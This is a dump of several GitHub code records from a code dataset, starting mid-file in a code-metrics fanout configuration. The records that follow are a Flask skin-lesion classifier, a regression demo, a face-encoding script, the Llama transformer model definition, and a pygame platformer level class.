needle=['Token.Literal.String'],\n trim=['\"', \"'\"]),\n 'PHP': TokenTreeConfig(\n start=[('Token.Keyword', 'include'), ('Token.Keyword', 'require'),\n ('Token.Keyword', 'include_once'), ('Token.Keyword', 'require_once')],\n end=[('Token.Punctuation', ';'), ('Token.Text', '\\n')],\n needle=['Token.Literal.String'],\n trim=['\"', \"'\"]),\n 'Ruby': TokenTreeConfig(\n start=[('Token.Name.Builtin', 'require')],\n end=[('Token.Text.Whitespace', r'\\)')],\n needle=['Token.Literal', 'Token.Literal.String.Double'],\n trim=['\"', \"'\"]),\n 'Python': TokenTreeConfig(\n start=[('Token.Keyword.Namespace', 'import'), ('Token.Keyword.Namespace', 'from')],\n end=[('Token.Text', '\\n')],\n needle=['Token.Name.Namespace', 'Token.Keyword.Namespace', 'Token.Name'],\n trim=[]),\n 'Bash': TokenTreeConfig(\n start=[('Token.Name.Builtin', 'source'), ('Token.Text', r'\\.')],\n end=[('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Text'],\n trim=[' ', '\\n']),\n 'CoffeeScript': TokenTreeConfig(\n start=[('Token.Name.Other', 'require'), ('Token.Name.Other', 'import')],\n end=[('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Literal.String'],\n trim=['\"', \"'\", ' ']),\n 'C#': TokenTreeConfig(\n start=[('Token.Keyword', 'using')],\n end=[('Token.Punctuation', ';')],\n needle=['Token.Name.Namespace'],\n trim=['\"', \"'\", ' ']),\n 'Dart': TokenTreeConfig(\n start=[('Token.Keyword', 'import')],\n end=[('Token.Punctuation', ';')],\n needle=['Token.Literal.String'],\n trim=['\"', \"'\", ' ']),\n 'Groovy': TokenTreeConfig(\n start=[('Token.Keyword.Namespace', 'import')],\n end=[('Token.Operator', ';'), ('Token.Text', '\\n')],\n needle=['Token.Name.Namespace'],\n trim=[' ']),\n 'Haskell': TokenTreeConfig(\n start=[('Token.Keyword.Reserved', 'import')],\n end=[('Token.Text', '\\n')],\n needle=['Token.Name.Namespace'],\n trim=[' ']),\n 'Julia': TokenTreeConfig(\n start=[('Token.Keyword', 'import'), ('Token.Keyword', 'using')],\n end=[('Token.Text', '\\n'), ('Token.Operator', ':')],\n needle=['Token.Name', 'Token.Operator'],\n trim=[' ', ':']),\n 'Java': TokenTreeConfig(\n start=[('Token.Keyword.Namespace', 'import')],\n end=[('Token.Text', '\\n'), ('Token.Punctuation', ';')],\n needle=['Token.Name.Namespace'],\n trim=[' ']),\n 'JavaScript': TokenTreeConfig(\n start=[('Token.Keyword', 'import'), ('Token.Keyword.Reserved', 'from')],\n end=[('Token.Text', '\\n'), ('Token.Punctuation', ';'), ('Token.Punctuation', '{')],\n needle=['Token.Literal.String'],\n trim=[' ', '\"', \"'\"]),\n 'Kotlin': TokenTreeConfig(\n start=[('Token.Keyword', 'import')],\n end=[('Token.Text', '\\n')],\n needle=['Token.Name.Namespace'],\n trim=[' ']),\n 'Lua': TokenTreeConfig(\n start=[('Token.Name.Builtin', 'require')],\n end=[('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Literal.String'],\n trim=[' ', '\"', \"'\"]),\n 'Objective-C': TokenTreeConfig(\n start=[('Token.Comment.Preproc', 'import .*')],\n end=[('Token.Comment.Preproc', '\\n'), ('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Comment.Preproc'],\n trim=[' ', '\"', \"'\", '\\n', 'import '],\n include_start=True),\n 'Prolog': TokenTreeConfig(\n start=[('Token.Literal.String', 'use')],\n end=[('Token.Punctuation', ';'), ('Token.Text', '\\n')],\n needle=['Token.Literal'],\n trim=[' ']),\n 'Rust': TokenTreeConfig(\n start=[('Token.Keyword', 'use')],\n end=[('Token.Punctuation', ';'), ('Token.Text', '\\n')],\n needle=['Token.Name', 'Token.Keyword', 'Token.Literal', 'Token.Text'],\n trim=[' ']),\n 'Tcl': 
TokenTreeConfig(\n start=[('Token.Text', 'import')],\n end=[('Token.Text', 'forget'), ('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Text'],\n trim=[' ', '-', 'force', 'import', '\\n'],\n split_by=' '),\n 'TypeScript': TokenTreeConfig(\n start=[('Token.Keyword', 'import'), ('Token.Keyword.Reserved', 'from')],\n end=[('Token.Text', '\\n'), ('Token.Punctuation', ';'), ('Token.Punctuation', '{')],\n needle=['Token.Literal.String'],\n trim=[' ', '\"', \"'\"]),\n 'Zig': TokenTreeConfig(\n start=[('Token.Name.Builtin', '@import')],\n end=[('Token.Text', '\\n'), ('Token.Punctuation', ';')],\n needle=['Token.Literal'],\n trim=[' ', '\"', \"'\"]),\n 'default': TokenTreeConfig(\n start=[('Token.Comment.Preproc', 'include'), ('Token.Comment.Namespace', '')],\n end=[('Token.Text.Whitespace', '\\n'), ('Token.Comment.Preproc', '\\n')],\n needle=['Token.Comment.PreprocFile'],\n trim=[]),\n }\n\n _internal = {\n \"Python\": {\"start\": '.', \"end\": ''},\n \"C\": {\"start\": '\"', \"end\": '\"'},\n \"C++\": {\"start\": '\"', \"end\": '\"'},\n \"CoffeeScript\": {\"start\": './', \"end\": ''},\n \"Julia\": {\"start\": '.', \"end\": ''},\n \"TypeScript\": {\"start\": './', \"end\": ''},\n }\n\n METRIC_FANOUT_INTERNAL = \"fanout_internal\"\n METRIC_FANOUT_EXTERNAL = \"fanout_external\"\n\n def __init__(self, args, **kwargs):\n super().__init__(args, **kwargs)\n self._int = set()\n self._ext = set()\n\n def __isInternal(self, value, internal_mapping):\n if not internal_mapping:\n return False\n return all([value.startswith(internal_mapping[\"start\"]), # pragma: no cover - bug in pytest-cov\n value.endswith(internal_mapping[\"end\"])])\n\n def parse_tokens(self, language, tokens):\n super().parse_tokens(language, [])\n\n config = MetricBaseFanout._config.get(language, MetricBaseFanout._config['default'])\n _imports = TokenTree.get_from_token_tree(enumerate(tokens), config)\n\n for x in _imports:\n if self.__isInternal(x, MetricBaseFanout._internal.get(language, {})):\n self._int.add(str(x)) # pragma: no cover - bug in pytest-cov\n else:\n self._ext.add(str(x))\n self._metrics.update({MetricBaseFanout.METRIC_FANOUT_INTERNAL: len(list(self._int)),\n MetricBaseFanout.METRIC_FANOUT_EXTERNAL: len(list(self._ext))})\n self._internalstore[\"int\"] = list(self._int)\n self._internalstore[\"ext\"] = list(self._ext)\n\n def get_results_global(self, value_stores):\n _int = []\n _ext = []\n for x in self._get_all_matching_store_objects(value_stores):\n _int += x[\"int\"]\n _ext += x[\"ext\"]\n return {\n MetricBaseFanout.METRIC_FANOUT_INTERNAL: len(_int),\n MetricBaseFanout.METRIC_FANOUT_EXTERNAL: len(_ext),\n }\n","repo_name":"priv-kweihmann/multimetric","sub_path":"multimetric/cls/metric/fanout.py","file_name":"fanout.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"25497258458","text":"from __future__ import division, print_function\nimport sys\nimport os\nimport glob\nimport re\nimport numpy as np\n\nimport torch\nfrom PIL import Image\nimport albumentations as aug\n#from efficientnet_pytorch import EfficientNet\nfrom flask import Flask, redirect, url_for, request, render_template,jsonify\nfrom werkzeug.utils import secure_filename\nfrom gevent.pywsgi import WSGIServer\n\napp = Flask(__name__)\n\nmodel = torch.load('canc.pth')\nmodel.eval()\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\ndef model_predict(file, model):\n image = Image.open(file)\n image = 
np.array(image)\n transforms = aug.Compose([\n aug.Resize(224,224),\n aug.Normalize((0.485, 0.456, 0.406),(0.229, 0.224, 0.225),max_pixel_value=255.0,always_apply=True),\n ])\n image = transforms(image=image)[\"image\"]\n image = np.transpose(image, (2, 0, 1)).astype(np.float32)\n image = torch.tensor([image], dtype=torch.float)\n preds = model(image)\n preds = np.argmax(preds.detach())\n return preds\n\ndef save_image(url):\n import requests # the download needs the requests HTTP library; Flask's request object has no get()\n response = requests.get(url)\n if response.status_code == 200:\n with open(\"img.png\",'wb') as f:\n f.write(response.content)\n\n\n@app.route('/predict', methods=['POST'])\ndef upload():\n skin_lesion=request.get_json()\n image_url=skin_lesion['url']\n print(image_url)\n save_image(image_url)\n labs= ['MELANOMA', 'MELANOCYTIC NEVUS', 'BASAL CELL CARCINOMA', 'ACTINIC KERATOSIS', 'BENIGN KERATOSIS', 'DERMATOFIBROMA', 'VASCULAR LESION', 'SQUAMOUS CELL CARCINOMA']\n preds = model_predict(\"img.png\", model) # predict on the local copy saved by save_image, not the raw URL\n result = labs[preds]\n return jsonify({'result':result})\n\nif __name__ == '__main__':\n\tapp.run(host=\"127.0.0.1\",port=8080,debug=True)\n\n","repo_name":"random-dark/fallfest","sub_path":"HeartRateClassification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"42781925993","text":"# learning to use a regression model\n# first thing I realized is that I don't know much about regression yet, time for YouTube\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import datasets, linear_model\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom cycler import cycler\n\ndiabetes = datasets.load_diabetes()\ndiabetes_X = diabetes.data[:, np.newaxis, 2]\n\n# this is a clumsy way to split the sample into test and train, so I did it with a function I learned from knn.\n'''\ndiabetes_X_train = diabetes_X[:-20]\ndiabetes_X_test = diabetes_X[-20:]\n\ndiabetes_y_train = diabetes.target[:-20]\ndiabetes_y_test = diabetes.target[-20:]\n'''\n\n\n\nfor i in range(0,10):\n diabetes_X_train, diabetes_X_test, diabetes_y_train, diabetes_y_test = train_test_split(diabetes_X, diabetes.target, test_size=0.3)\n\n regr = linear_model.LinearRegression()\n\n regr.fit(diabetes_X_train, diabetes_y_train)\n\n print(\"Coefficient: \\n\", regr.coef_)\n print(\"Mean squared error: %.2f\"\n % np.mean((regr.predict(diabetes_X_test) - diabetes_y_test) ** 2))\n\n print('Variance score: %.2f' % regr.score(diabetes_X_test, diabetes_y_test))\n\n plt.scatter(diabetes_X_test, diabetes_y_test)\n plt.plot(diabetes_X_test, regr.predict(diabetes_X_test))\n\nplt.rc('lines', linewidth=1)\nplt.rc('axes', prop_cycle=(cycler('color', ['r', 'g', 'b', 'y'])))\nplt.xticks(())\nplt.yticks(())\nplt.show()\n\nplt.savefig('display.png')\n\n","repo_name":"naosz/machinelearning_beginning","sub_path":"regressiondemo.py","file_name":"regressiondemo.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"22989417002","text":"import pprint\nimport sqlite3\n\nfrom imutils import paths\nimport face_recognition\nimport pickle\nimport cv2\nimport os\n\ncon = sqlite3.Connection('face_enc.sqlite')\ncur = con.cursor()\nnames = cur.execute('SELECT info FROM Users').fetchall()\nimagePaths = []\nfor i in names:\n imagePaths.append((os.listdir(os.getcwd() + '\\\\Images\\\\' + i[0]), i[0]))\n# the Images directory holds the folders with all the images\n# imagePaths = list(paths.list_images('Images'))\nknownEncodings = []\nknownNames = []\n# # iterate over all the folders with images\nfor (i, imagePath) in enumerate(imagePaths):\n for j in imagePath[0]:\n # extract the person's name from the folder name\n # name = imagePath.split(os.path.sep)[-1]\n name = imagePath[-1]\n # load the image and convert it from BGR (OpenCV ordering)\n # to dlib ordering (RGB)\n print(j, name)\n image = cv2.imread(f'Images\\\\{name}\\\\' + j)\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # use the Face_recognition library to detect faces\n boxes = face_recognition.face_locations(rgb, model='hog')\n # compute the embeddings for each face\n encodings = face_recognition.face_encodings(rgb, boxes)\n # loop over the encodings\n for encoding in encodings:\n knownEncodings.append(encoding)\n knownNames.append(name)\n# save the embeddings together with their names as a dictionary\ndata = {\"encodings\": knownEncodings, \"names\": knownNames}\n# use the pickle module to save the data to a file\nf = open(\"face_enc\", \"wb\")\nf.write(pickle.dumps(data))\nf.close()\ncon.close()\n","repo_name":"RaZe31-cs/Face_recognition","sub_path":"load_face.py","file_name":"load_face.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"17792388211","text":"import math\nfrom dataclasses import dataclass\nfrom typing import Optional, Tuple\n\nimport fairscale.nn.model_parallel.initialize as fs_init\nimport torch\nimport torch.nn.functional as F\nfrom fairscale.nn.model_parallel.layers import (\n ColumnParallelLinear,\n ParallelEmbedding,\n RowParallelLinear,\n)\nfrom torch import nn\n\n\n@dataclass\nclass ModelArgs:\n dim: int = 4096\n n_layers: int = 32\n n_heads: int = 32\n n_kv_heads: Optional[int] = None\n vocab_size: int = -1 # defined later by tokenizer\n multiple_of: int = 256 # make SwiGLU hidden layer size multiple of large power of 2\n ffn_dim_multiplier: Optional[float] = None\n norm_eps: float = 1e-5\n\n max_batch_size: int = 32\n max_seq_len: int = 2048\n\n\nclass RMSNorm(torch.nn.Module):\n def __init__(self, dim: int, eps: float = 1e-6):\n \"\"\"\n Initialize the RMSNorm normalization layer.\n\n Args:\n dim (int): The dimension of the input tensor.\n eps (float, optional): A small value added to the denominator for numerical stability. Default is 1e-6.\n\n Attributes:\n eps (float): A small value added to the denominator for numerical stability.\n weight (nn.Parameter): Learnable scaling parameter.\n\n \"\"\"\n super().__init__()\n self.eps = eps\n self.weight = nn.Parameter(torch.ones(dim))\n\n def _norm(self, x):\n \"\"\"\n Apply the RMSNorm normalization to the input tensor.\n\n Args:\n x (torch.Tensor): The input tensor.\n\n Returns:\n torch.Tensor: The normalized tensor.\n\n \"\"\"\n return x * torch.rsqrt(x.pow(2).mean(-1, keepdim=True) + self.eps)\n\n def forward(self, x):\n \"\"\"\n Forward pass through the RMSNorm layer.\n\n Args:\n x (torch.Tensor): The input tensor.\n\n Returns:\n torch.Tensor: The output tensor after applying RMSNorm.\n\n \"\"\"\n output = self._norm(x.float()).type_as(x)\n return output * self.weight\n\n\ndef precompute_freqs_cis(dim: int, end: int, theta: float = 10000.0):\n \"\"\"\n Precompute the frequency tensor for complex exponentials (cis) with given dimensions.\n\n This function calculates a frequency tensor with complex exponentials using the given dimension 'dim'\n    and the end index 'end'. 
The 'theta' parameter scales the frequencies.\n The returned tensor contains complex values in complex64 data type.\n\n Args:\n dim (int): Dimension of the frequency tensor.\n end (int): End index for precomputing frequencies.\n theta (float, optional): Scaling factor for frequency computation. Defaults to 10000.0.\n\n Returns:\n torch.Tensor: Precomputed frequency tensor with complex exponentials.\n\n \n \n\n \"\"\"\n freqs = 1.0 / (theta ** (torch.arange(0, dim, 2)[: (dim // 2)].float() / dim))\n t = torch.arange(end, device=freqs.device) # type: ignore\n freqs = torch.outer(t, freqs).float() # type: ignore\n freqs_cis = torch.polar(torch.ones_like(freqs), freqs) # complex64\n return freqs_cis\n\n\ndef reshape_for_broadcast(freqs_cis: torch.Tensor, x: torch.Tensor):\n \"\"\"\n Reshape frequency tensor for broadcasting it with another tensor.\n\n This function reshapes the frequency tensor to have the same shape as the target tensor 'x'\n for the purpose of broadcasting the frequency tensor during element-wise operations.\n\n Args:\n freqs_cis (torch.Tensor): Frequency tensor to be reshaped.\n x (torch.Tensor): Target tensor for broadcasting compatibility.\n\n Returns:\n torch.Tensor: Reshaped frequency tensor.\n\n Raises:\n AssertionError: If the frequency tensor doesn't match the expected shape.\n AssertionError: If the target tensor 'x' doesn't have the expected number of dimensions.\n \"\"\"\n ndim = x.ndim\n assert 0 <= 1 < ndim\n assert freqs_cis.shape == (x.shape[1], x.shape[-1])\n shape = [d if i == 1 or i == ndim - 1 else 1 for i, d in enumerate(x.shape)]\n return freqs_cis.view(*shape)\n\n\ndef apply_rotary_emb(\n xq: torch.Tensor,\n xk: torch.Tensor,\n freqs_cis: torch.Tensor,\n) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Apply rotary embeddings to input tensors using the given frequency tensor.\n\n This function applies rotary embeddings to the given query 'xq' and key 'xk' tensors using the provided\n frequency tensor 'freqs_cis'. The input tensors are reshaped as complex numbers, and the frequency tensor\n is reshaped for broadcasting compatibility. 
The resulting tensors contain rotary embeddings and are\n returned as real tensors.\n\n Args:\n xq (torch.Tensor): Query tensor to apply rotary embeddings.\n xk (torch.Tensor): Key tensor to apply rotary embeddings.\n freqs_cis (torch.Tensor): Precomputed frequency tensor for complex exponentials.\n\n Returns:\n Tuple[torch.Tensor, torch.Tensor]: Tuple of modified query tensor and key tensor with rotary embeddings.\n\n \n\n \"\"\"\n xq_ = torch.view_as_complex(xq.float().reshape(*xq.shape[:-1], -1, 2))\n xk_ = torch.view_as_complex(xk.float().reshape(*xk.shape[:-1], -1, 2))\n freqs_cis = reshape_for_broadcast(freqs_cis, xq_)\n xq_out = torch.view_as_real(xq_ * freqs_cis).flatten(3)\n xk_out = torch.view_as_real(xk_ * freqs_cis).flatten(3)\n return xq_out.type_as(xq), xk_out.type_as(xk)\n\n\ndef repeat_kv(x: torch.Tensor, n_rep: int) -> torch.Tensor:\n \"\"\"torch.repeat_interleave(x, dim=2, repeats=n_rep)\"\"\"\n bs, slen, n_kv_heads, head_dim = x.shape\n if n_rep == 1:\n return x\n return (\n x[:, :, :, None, :]\n .expand(bs, slen, n_kv_heads, n_rep, head_dim)\n .reshape(bs, slen, n_kv_heads * n_rep, head_dim)\n )\n\n\nclass Attention(nn.Module):\n \"\"\"Multi-head attention module.\"\"\"\n def __init__(self, args: ModelArgs):\n \"\"\"\n Initialize the Attention module.\n\n Args:\n args (ModelArgs): Model configuration parameters.\n\n Attributes:\n n_kv_heads (int): Number of key and value heads.\n n_local_heads (int): Number of local query heads.\n n_local_kv_heads (int): Number of local key and value heads.\n n_rep (int): Number of repetitions for local heads.\n head_dim (int): Dimension size of each attention head.\n wq (ColumnParallelLinear): Linear transformation for queries.\n wk (ColumnParallelLinear): Linear transformation for keys.\n wv (ColumnParallelLinear): Linear transformation for values.\n wo (RowParallelLinear): Linear transformation for output.\n cache_k (torch.Tensor): Cached keys for attention.\n cache_v (torch.Tensor): Cached values for attention.\n\n \"\"\"\n super().__init__()\n self.n_kv_heads = args.n_heads if args.n_kv_heads is None else args.n_kv_heads\n model_parallel_size = fs_init.get_model_parallel_world_size()\n self.n_local_heads = args.n_heads // model_parallel_size\n self.n_local_kv_heads = self.n_kv_heads // model_parallel_size\n self.n_rep = self.n_local_heads // self.n_local_kv_heads\n self.head_dim = args.dim // args.n_heads\n\n self.wq = ColumnParallelLinear(\n args.dim,\n args.n_heads * self.head_dim,\n bias=False,\n gather_output=False,\n init_method=lambda x: x,\n )\n self.wk = ColumnParallelLinear(\n args.dim,\n self.n_kv_heads * self.head_dim,\n bias=False,\n gather_output=False,\n init_method=lambda x: x,\n )\n self.wv = ColumnParallelLinear(\n args.dim,\n self.n_kv_heads * self.head_dim,\n bias=False,\n gather_output=False,\n init_method=lambda x: x,\n )\n self.wo = RowParallelLinear(\n args.n_heads * self.head_dim,\n args.dim,\n bias=False,\n input_is_parallel=True,\n init_method=lambda x: x,\n )\n\n self.cache_k = torch.zeros(\n (\n args.max_batch_size,\n args.max_seq_len,\n self.n_local_kv_heads,\n self.head_dim,\n )\n ).cuda()\n self.cache_v = torch.zeros(\n (\n args.max_batch_size,\n args.max_seq_len,\n self.n_local_kv_heads,\n self.head_dim,\n )\n ).cuda()\n\n def forward(\n self,\n x: torch.Tensor,\n start_pos: int,\n freqs_cis: torch.Tensor,\n mask: Optional[torch.Tensor],\n ):\n \"\"\"\n Forward pass of the attention module.\n\n Args:\n x (torch.Tensor): Input tensor.\n start_pos (int): Starting position for caching.\n freqs_cis 
(torch.Tensor): Precomputed frequency tensor.\n mask (torch.Tensor, optional): Attention mask tensor.\n\n Returns:\n torch.Tensor: Output tensor after attention.\n\n \"\"\"\n bsz, seqlen, _ = x.shape\n xq, xk, xv = self.wq(x), self.wk(x), self.wv(x)\n\n xq = xq.view(bsz, seqlen, self.n_local_heads, self.head_dim)\n xk = xk.view(bsz, seqlen, self.n_local_kv_heads, self.head_dim)\n xv = xv.view(bsz, seqlen, self.n_local_kv_heads, self.head_dim)\n\n xq, xk = apply_rotary_emb(xq, xk, freqs_cis=freqs_cis)\n\n self.cache_k = self.cache_k.to(xq)\n self.cache_v = self.cache_v.to(xq)\n\n self.cache_k[:bsz, start_pos : start_pos + seqlen] = xk\n self.cache_v[:bsz, start_pos : start_pos + seqlen] = xv\n\n keys = self.cache_k[:bsz, : start_pos + seqlen]\n values = self.cache_v[:bsz, : start_pos + seqlen]\n\n # repeat k/v heads if n_kv_heads < n_heads\n keys = repeat_kv(keys, self.n_rep) # (bs, seqlen, n_local_heads, head_dim)\n values = repeat_kv(values, self.n_rep) # (bs, seqlen, n_local_heads, head_dim)\n\n xq = xq.transpose(1, 2) # (bs, n_local_heads, seqlen, head_dim)\n keys = keys.transpose(1, 2)\n values = values.transpose(1, 2)\n scores = torch.matmul(xq, keys.transpose(2, 3)) / math.sqrt(self.head_dim)\n if mask is not None:\n scores = scores + mask # (bs, n_local_heads, seqlen, cache_len + seqlen)\n scores = F.softmax(scores.float(), dim=-1).type_as(xq)\n output = torch.matmul(scores, values) # (bs, n_local_heads, seqlen, head_dim)\n output = output.transpose(1, 2).contiguous().view(bsz, seqlen, -1)\n return self.wo(output)\n\n\nclass FeedForward(nn.Module):\n def __init__(\n self,\n dim: int,\n hidden_dim: int,\n multiple_of: int,\n ffn_dim_multiplier: Optional[float],\n ):\n \"\"\"\n Initialize the FeedForward module.\n\n Args:\n dim (int): Input dimension.\n hidden_dim (int): Hidden dimension of the feedforward layer.\n multiple_of (int): Value to ensure hidden dimension is a multiple of this value.\n ffn_dim_multiplier (float, optional): Custom multiplier for hidden dimension. 
Defaults to None.\n\n Attributes:\n w1 (ColumnParallelLinear): Linear transformation for the first layer.\n w2 (RowParallelLinear): Linear transformation for the second layer.\n w3 (ColumnParallelLinear): Linear transformation for the third layer.\n\n \"\"\"\n super().__init__()\n hidden_dim = int(2 * hidden_dim / 3)\n # custom dim factor multiplier\n if ffn_dim_multiplier is not None:\n hidden_dim = int(ffn_dim_multiplier * hidden_dim)\n hidden_dim = multiple_of * ((hidden_dim + multiple_of - 1) // multiple_of)\n\n self.w1 = ColumnParallelLinear(\n dim, hidden_dim, bias=False, gather_output=False, init_method=lambda x: x\n )\n self.w2 = RowParallelLinear(\n hidden_dim, dim, bias=False, input_is_parallel=True, init_method=lambda x: x\n )\n self.w3 = ColumnParallelLinear(\n dim, hidden_dim, bias=False, gather_output=False, init_method=lambda x: x\n )\n\n def forward(self, x):\n return self.w2(F.silu(self.w1(x)) * self.w3(x))\n\n\nclass TransformerBlock(nn.Module):\n def __init__(self, layer_id: int, args: ModelArgs):\n \"\"\"\n Initialize a TransformerBlock.\n\n Args:\n layer_id (int): Identifier for the layer.\n args (ModelArgs): Model configuration parameters.\n\n Attributes:\n n_heads (int): Number of attention heads.\n dim (int): Dimension size of the model.\n head_dim (int): Dimension size of each attention head.\n attention (Attention): Attention module.\n feed_forward (FeedForward): FeedForward module.\n layer_id (int): Identifier for the layer.\n attention_norm (RMSNorm): Layer normalization for attention output.\n ffn_norm (RMSNorm): Layer normalization for feedforward output.\n\n \"\"\"\n super().__init__()\n self.n_heads = args.n_heads\n self.dim = args.dim\n self.head_dim = args.dim // args.n_heads\n self.attention = Attention(args)\n self.feed_forward = FeedForward(\n dim=args.dim,\n hidden_dim=4 * args.dim,\n multiple_of=args.multiple_of,\n ffn_dim_multiplier=args.ffn_dim_multiplier,\n )\n self.layer_id = layer_id\n self.attention_norm = RMSNorm(args.dim, eps=args.norm_eps)\n self.ffn_norm = RMSNorm(args.dim, eps=args.norm_eps)\n\n def forward(\n self,\n x: torch.Tensor,\n start_pos: int,\n freqs_cis: torch.Tensor,\n mask: Optional[torch.Tensor],\n ):\n \"\"\"\n Perform a forward pass through the TransformerBlock.\n\n Args:\n x (torch.Tensor): Input tensor.\n start_pos (int): Starting position for attention caching.\n freqs_cis (torch.Tensor): Precomputed cosine and sine frequencies.\n mask (torch.Tensor, optional): Masking tensor for attention. 
Defaults to None.\n\n Returns:\n torch.Tensor: Output tensor after applying attention and feedforward layers.\n\n \"\"\"\n h = x + self.attention.forward(\n self.attention_norm(x), start_pos, freqs_cis, mask\n )\n out = h + self.feed_forward.forward(self.ffn_norm(h))\n return out\n\n\nclass Transformer(nn.Module):\n def __init__(self, params: ModelArgs):\n \"\"\"\n Initialize a Transformer model.\n\n Args:\n params (ModelArgs): Model configuration parameters.\n\n Attributes:\n params (ModelArgs): Model configuration parameters.\n vocab_size (int): Vocabulary size.\n n_layers (int): Number of layers in the model.\n tok_embeddings (ParallelEmbedding): Token embeddings.\n layers (torch.nn.ModuleList): List of Transformer blocks.\n norm (RMSNorm): Layer normalization for the model output.\n output (ColumnParallelLinear): Linear layer for final output.\n freqs_cis (torch.Tensor): Precomputed cosine and sine frequencies.\n\n \"\"\"\n super().__init__()\n self.params = params\n self.vocab_size = params.vocab_size\n self.n_layers = params.n_layers\n\n self.tok_embeddings = ParallelEmbedding(\n params.vocab_size, params.dim, init_method=lambda x: x\n )\n\n self.layers = torch.nn.ModuleList()\n for layer_id in range(params.n_layers):\n self.layers.append(TransformerBlock(layer_id, params))\n\n self.norm = RMSNorm(params.dim, eps=params.norm_eps)\n self.output = ColumnParallelLinear(\n params.dim, params.vocab_size, bias=False, init_method=lambda x: x\n )\n\n self.freqs_cis = precompute_freqs_cis(\n # Note that self.params.max_seq_len is multiplied by 2 because the token limit for the Llama 2 generation of models is 4096. \n # Adding this multiplier instead of using 4096 directly allows for dynamism of token lengths while training or fine-tuning.\n self.params.dim // self.params.n_heads, self.params.max_seq_len * 2\n )\n\n @torch.inference_mode()\n def forward(self, tokens: torch.Tensor, start_pos: int):\n \"\"\"\n Perform a forward pass through the Transformer model.\n\n Args:\n tokens (torch.Tensor): Input token indices.\n start_pos (int): Starting position for attention caching.\n\n Returns:\n torch.Tensor: Output logits after applying the Transformer model.\n\n \"\"\"\n _bsz, seqlen = tokens.shape\n h = self.tok_embeddings(tokens)\n self.freqs_cis = self.freqs_cis.to(h.device)\n freqs_cis = self.freqs_cis[start_pos : start_pos + seqlen]\n\n mask = None\n if seqlen > 1:\n mask = torch.full(\n (1, 1, seqlen, seqlen), float(\"-inf\"), device=tokens.device\n )\n mask = torch.triu(mask, diagonal=start_pos + 1).type_as(h)\n\n for layer in self.layers:\n h = layer(h, start_pos, freqs_cis, mask)\n h = self.norm(h)\n output = self.output(h).float()\n return output\n","repo_name":"facebookresearch/llama","sub_path":"llama/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":17212,"program_lang":"python","lang":"en","doc_type":"code","stars":45685,"dataset":"github-code","pt":"72"} +{"seq_id":"26267324577","text":"import pygame\nfrom Tiles import Tile\nfrom Player import Player\nfrom Exit import Exit\nfrom Coins import Coin\n\n\ntile_size = 64\n\n\nclass Level:\n def __init__(self, level_data, surface):\n self.display_surface = surface\n self.setup_level(level_data)\n self.world_shift = 0\n\n self.score = 0\n\n self.money_collect_sound = pygame.mixer.Sound('moneycollect.ogg')\n\n def setup_level(self, layout):\n self.tiles = pygame.sprite.Group()\n self.coins = pygame.sprite.Group()\n\n self.player = pygame.sprite.GroupSingle()\n\n self.exit = pygame.sprite.GroupSingle()\n\n for row_index, 
row in enumerate(layout):\n for col_index, cell in enumerate(row):\n if cell == 'X':\n x = col_index * tile_size\n y = row_index * tile_size\n tile = Tile((x, y), tile_size)\n self.tiles.add(tile)\n if cell == 'P':\n x = col_index * tile_size\n y = row_index * tile_size\n player_sprite = Player((x, y))\n self.player.add(player_sprite)\n if cell == 'E':\n x = col_index * tile_size\n y = row_index * tile_size\n exit1 = Exit((x, y), tile_size)\n self.exit.add(exit1)\n if cell == 'C':\n x = col_index * tile_size\n y = row_index * tile_size\n coin = Coin((x, y), tile_size)\n self.coins.add(coin)\n\n def horizontal_movement_collision(self):\n player = self.player.sprite\n player.rect.x += player.direction.x * player.speed\n\n for sprite in self.tiles.sprites():\n if sprite.rect.colliderect(player.rect):\n if player.direction.x < 0:\n player.rect.left = sprite.rect.right\n elif player.direction.x > 0:\n player.rect.right = sprite.rect.left\n\n def vertical_movement_collision(self):\n player = self.player.sprite\n player.apply_gravity()\n\n for sprite in self.tiles.sprites():\n if sprite.rect.colliderect(player.rect):\n if player.direction.y > 0:\n player.rect.bottom = sprite.rect.top\n player.direction.y = 0\n elif player.direction.y < 0:\n player.rect.top = sprite.rect.bottom\n player.direction.y = 0\n\n def coin_collect(self):\n player = self.player.sprite\n\n if pygame.sprite.spritecollide(player, self.coins, True):\n self.money_collect_sound.play()\n self.score += 100\n\n def exit_collision(self):\n player = self.player.sprite\n\n if pygame.sprite.spritecollide(player, self.exit, False):\n return True\n return False\n\n def run(self):\n self.tiles.update(self.world_shift)\n self.tiles.draw(self.display_surface)\n\n self.exit.update(self.world_shift)\n self.exit.draw(self.display_surface)\n\n self.coins.draw(self.display_surface)\n\n self.player.update()\n self.horizontal_movement_collision()\n self.vertical_movement_collision()\n self.coin_collect()\n\n self.player.draw(self.display_surface)\n\n if self.exit_collision():\n return False, self.score\n return True, self.score\n\n","repo_name":"GiantOfTheMind/PyGameProject","sub_path":"Level1.py","file_name":"Level1.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25331823456","text":"\"\"\"\nMain configuration file for the application\n\nOn deployment, desired configuration can be overridden by the provision of a local.cfg file\n\"\"\"\n\n##################################################\n# overrides for the webapp 